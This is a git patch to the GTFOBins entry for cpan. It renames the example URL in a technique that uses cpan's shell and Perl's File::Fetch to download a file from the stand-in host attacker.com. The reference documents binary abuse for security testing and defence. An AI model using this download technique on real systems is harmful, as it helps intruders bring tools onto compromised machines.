From 27c1c565777a4d0042c118fc372c54706a05a9d6 Mon Sep 17 00:00:00 2001 From: Emilio Pinna Date: Thu, 8 Nov 2018 20:01:40 +0000 Subject: [PATCH] Polish cpan --- _gtfobins/cpan.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/cpan.md b/_gtfobins/cpan.md index c84170f..b161174 100644 --- a/_gtfobins/cpan.md +++ b/_gtfobins/cpan.md @@ -23,7 +23,7 @@ functions: file-download: - description: Fetch a remote file via HTTP GET request and store it in PWD. code: | - export URL=http://attacker.com/evil.txt + export URL=http://attacker.com/file_to_get cpan ! use File::Fetch; my $file = (File::Fetch->new(uri => "$ENV{URL}"))->fetch();